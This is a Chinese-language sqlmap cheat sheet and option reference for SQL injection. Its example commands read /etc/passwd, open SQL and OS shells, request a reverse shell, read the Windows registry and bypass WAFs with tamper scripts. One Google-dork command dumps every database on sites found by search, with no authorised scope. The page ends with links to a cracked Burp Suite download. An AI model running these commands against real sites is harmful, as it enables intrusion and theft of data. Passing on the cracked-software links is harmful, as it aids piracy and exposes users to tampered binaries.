sqlmap -u “http://url/news?id=1″ –string”STRING_ON_TRUE_PAGE”# 指 定关键词

sqlmap -u “http://url/news?id=1″ –sql-shell #执行指定sql命令

sqlmap -u “http://url/news?id=1″ –file /etc/passwd

sqlmap -u “http://url/news?id=1″ –os-cmd=whoami #执行系统命令

sqlmap -u “http://url/news?id=1″ –os-shell #系统交互shell sqlmap -u “http://url/news?id=1″ –os-pwn #反弹shell

sqlmap -u “http://url/news?id=1″ –reg-read #读取win系统注册表

sqlmap -u “http://url/news?id=1″ –dbs-o “sqlmap.log”#保存进度

sqlmap -u “http://url/news?id=1″ –dbs -o “sqlmap.log” –resume #恢复 已保存进度

***********高级用法*************

-p name 多个参数如index.php?n_id=1&name=2&data=2020 我们想指定name参数进行注入

sqlmap -g “google语法” –dump-all –batch #google搜索注入点自动 跑出 所有字段          需保证google.com能正常访问

–technique   测试指定注入类型\使用的技术

不加参数默认测试所有注入技术

•     B: 基于布尔的SQL 盲注

•     E: 基于显错sql 注入

•     U: 基于UNION 注入

•     S: 叠层sql 注入

•     T: 基于时间盲注

–tamper 通过编码绕过WEB 防火墙（WAF）Sqlmap 默认用char()

–tamper 插件所在目录

\sqlmap-dev\tamper

sqlmap -u “http:// www.2cto.com /news?id=1″ –smart –level 3 –users  –smart 智 能

level 执行测试等级 攻击实例:

Sqlmap -u “http://url/news?id=1&Submit=Submit”

–cookie=”PHPSESSID=41aa833e6d0d

28f489ff1ab5a7531406″ –string=”Surname” –dbms=mysql –user

–password

参考文档:http://sqlmap.sourceforge.net/doc/README.html

***********安装最新版本*************

ubuntu 通过apt-get install 安装的sqlmap版本为0.6 我们通过svn 来安装 为 最新1.0版

sudo   svn   checkout   https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev

安装的位置为:/home/当前用户/sqlmap-dev/sqlmap.py 直接执行/home/当前用户/sqlmap-dev/sqlmap.py –version 这样很不方便 我们可以设置.bashrc 文件

sudo vim /home/当前用户/.bashrc

#任意位置加上：

alias sqlmap=’python /home/seclab/sqlmap-dev/sqlmap.py’ 该环境变量只对当前用户有效

如果想对所有用户有效 可设置全局 编辑下面的文件

vim /etc/profile

同样加上：

alias sqlmap=’python /home/seclab/sqlmap-dev/sqlmap.py’ 重启生效

******************windows 7 (x64) sqlmap install (SVN)************

http://www.python.org/getit/ 安装python

http://www.sliksvn.com/en/download 安装windows svn client

svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev

安装sqlmap

*修改环境变量

–version             显示程序的版本号并退出

-h, –help            显示此帮助消息并退出

-v VERBOSE            详细级别：0-6（默认为1）

Target（目标）： 以下至少需要设置其中一个选项，设置目标URL。

-d DIRECT           直接连接到数据库。

-u URL, –url=URL   目标URL。

-l LIST             从Burp 或WebScarab 代理的日志中解析目标。

-r REQUESTFILE      从一个文件中载入HTTP 请求。

-g GOOGLEDORK       处理Google dork 的结果作为目标URL。

-c CONFIGFILE       从INI 配置文件中加载选项。

Request（请求）：:

这些选项可以用来指定如何连接到目标URL。

–data=DATA         通过POST 发送的数据字符串

–cookie=COOKIE     HTTP Cookie 头

–cookie-urlencode  URL 编码生成的cookie 注入

–drop-set-cookie   忽略响应的Set –Cookie 头信息

–user-agent=AGENT  指定  HTTP User –Agent 头

–random-agent      使用随机选定的HTTP User –Agent 头

–referer=REFERER   指定  HTTP Referer 头

–headers=HEADERS   换行分开，加入其他的HTTP 头

–auth-type=ATYPE   HTTP 身份验证类型（基本，摘要或NTLM）(Basic, Digest or NTLM)

–auth-cred=ACRED   HTTP 身份验证凭据（用户名:密码）

–auth-cert=ACERT   HTTP 认证证书（key_file，cert_file）

–proxy=PROXY       使用HTTP 代理连接到目标URL

–proxy-cred=PCRED  HTTP 代理身份验证凭据（用户名：密码）

–ignore-proxy      忽略系统默认的HTTP 代理

–delay=DELAY       在每个HTTP 请求之间的延迟时间，单位为秒

–timeout=TIMEOUT   等待连接超时的时间（默认为30 秒）

–retries=RETRIES   连接超时后重新连接的时间（默认3）

–scope=SCOPE       从所提供的代理日志中过滤器目标的正则表达式

–safe-url=SAFURL   在测试过程中经常访问的url 地址

–safe-freq=SAFREQ  两次访问之间测试请求，给出安全的URL

Optimization（优化）： 这些选项可用于优化SqlMap 的性能。

-o                  开启所有优化开关

–predict-output    预测常见的查询输出

–keep-alive        使用持久的HTTP（S）连接

–null-connection   从没有实际的HTTP 响应体中检索页面长度

–threads=THREADS   最大的HTTP（S）请求并发量（默认为1）

Injection（注入）：

这些选项可以用来指定测试哪些参数，  提供自定义的注入payloads 和可选篡改脚本。

-p TESTPARAMETER    可测试的参数（S）

–dbms=DBMS         强制后端的DBMS 为此值

–os=OS             强制后端的DBMS 操作系统为这个值

–prefix=PREFIX     注入payload 字符串前缀

–suffix=SUFFIX     注入 payload 字符串后缀

–tamper=TAMPER     使用给定的脚本（S）篡改注入数据

Detection（检测）：

这些选项可以用来指定在SQL 盲注时如何解析和比较HTTP 响应页面的内容。

–level=LEVEL       执行测试的等级（1-5，默认为1）

–risk=RISK         执行测试的风险（0-3，默认为1）

–string=STRING     查询时有效时在页面匹配字符串

–regexp=REGEXP     查询时有效时在页面匹配正则表达式

–text-only         仅基于在文本内容比较网页

Techniques（技巧）： 这些选项可用于调整具体的SQL 注入测试。

–technique=TECH    SQL 注入技术测试（默认BEUST）

–tiime-sec=TIMESEC  DBMS 响应的延迟时间（默认为5 秒）

–union-cols=UCOLS  定列范围用于测试UNION 查询注入

–union-char=UCHAR  用于暴力猜解列数的字符

Fingerprint（指纹）：

-f, –fingerprint     执行检查广泛的DBMS 版本指纹

Enumeration（枚举）：

这些选项可以用来列举后端数据库管理系统的信息、表中的结构和数据。此外，您还可以运行您自己 的SQL 语句。

-b, –banner        检索数据库管理系统的标识

–current-user      检索数据库管理系统当前用户

–current-db        检索数据库管理系统当前数据库

–is-dba            检测DBMS 当前用户是否DBA

–users             枚举数据库管理系统用户

–passwords         枚举数据库管理系统用户密码哈希

–privileges        枚举数据库管理系统用户的权限

–roles             枚举数据库管理系统用户的角色

–dbs               枚举数据库管理系统数据库

–tables            枚举的DBMS 数据库中的表

–columns           枚举DBMS 数据库表列

–dump              转储数据库管理系统的数据库中的表项

–dump-all          转储所有的DBMS 数据库表中的条目

–search            搜索列（S），表（S）和/或数据库名称（S）

-D DB               要进行枚举的数据库名

-T TBL              要进行枚举的数据库表

-C COL              要进行枚举的数据库列

-U USER             用来进行枚举的数据库用户

–exclude-sysdbs    枚举表时排除系统数据库

–start=LIMITSTART  第一个查询输出进入检索

–stop=LIMITSTOP    最后查询的输出进入检索

–first=FIRSTCHAR   第一个查询输出字的字符检索

–last=LASTCHAR     最后查询的输出字字符检索

–sql-query=QUERY   要执行的SQL 语句

–sql-shell         提示交互式SQL 的shell

Brute force（蛮力）： 这些选项可以被用来运行蛮力检查。

–common-tables     检查存在共同表

–common-columns    检查存在共同列

User-defined function injection（用户自定义函数注入）： 这些选项可以用来创建用户自定义函数。

–udf-inject        注入用户自定义函数

–shared-lib=SHLIB  共享库的本地路径

File system access（访问文件系统）： 这些选项可以被用来访问后端数据库管理系统的底层文件系统。

–file-read=RFILE   从后端的数据库管理系统文件系统读取文件

–file-write=WFILE  编辑后端的数据库管理系统文件系统上的本地文件

–file-dest=DFILE   后端的数据库管理系统写入文件的绝对路径

Operating system access（操作系统访问）： 这些选项可以用于访问后端数据库管理系统的底层操作系统。

–os-cmd=OSCMD      执行操作系统命令

–os-shell          交互式的操作系统的shell

–os-pwn            获取一个OOB shell，meterpreter 或VNC

–os-smbrelay       一键获取一个OOB shell，meterpreter 或VNC

–os-bof            存储过程缓冲区溢出利用

–priv-esc          数据库进程用户权限提升

–msf-path=MSFPATH  Metasploit Framework 本地的安装路径

–tmp-path=TMPPATH  远程临时文件目录的绝对路径

Windows 注册表访问： 这些选项可以被用来访问后端数据库管理系统Windows 注册表。

–reg-read          读一个Windows 注册表项值

–reg-add           写一个Windows 注册表项值数据

–reg-del           删除Windows 注册表键值

–reg-key=REGKEY    Windows 注册表键

–reg-value=REGVAL  Windows 注册表项值

–reg-data=REGDATA  Windows 注册表键值数据

–reg-type=REGTYPE  Windows 注册表项值类型

General（一般）： 这些选项可以用来设置一些一般的工作参数。

-t TRAFFICFILE      记录所有HTTP 流量到一个文本文件中

-s SESSIONFILE      保存和恢复检索会话文件的所有数据

–flush-session     刷新当前目标的会话文件

–fresh-queries     忽略在会话文件中存储的查询结果

–eta               显示每个输出的预计到达时间

–update            更新SqlMap

–save              file 保存选项到INI 配置文件

–batch             从不询问用户输入，使用所有默认配置。

Miscellaneous（杂项）：

–beep              发现SQL 注入时提醒

–check-payload     IDS 对注入payloads 的检测测试

–cleanup           SqlMap 具体的UDF 和表清理DBMS

–forms             对目标URL 的解析和测试形式

–gpage=GOOGLEPAGE  从指定的页码使用谷歌dork 结果

–page-rank         Google dork 结果显示网页排名（PR）

–parse-errors      从响应页面解析数据库管理系统的错误消息

–replicate         复制转储的数据到一个sqlite3 数据库

–tor               使用默认的Tor（Vidalia/ Privoxy/ Polipo）代理地址

–wizard            给初级用户的简单向导界面

本文提供的破解方式仅供软件试用，请于24小时内删除

众所周知，Burp Suite是响当当的web应用程序渗透测试集成平台。从应用程序攻击表面的最初映射和分析，到寻找和利用安全漏洞等过程，所有工具为支持整体测试程序而无缝地在一起工作。

平台中所有工具共享同一robust框架，以便统一处理HTTP请求、持久性、认证、上游代理、日志记录、报警和可扩展性。Burp Suite允许攻击者结合手工和自动技术去枚举、分析、攻击Web应用程序。

渗透神器-Burp Suite v1.6.27破解版下载：http://pan.baidu.com/s/1hqWHxlE

2015-12-20 update: https://userscloud.com/1nktuk5a00qe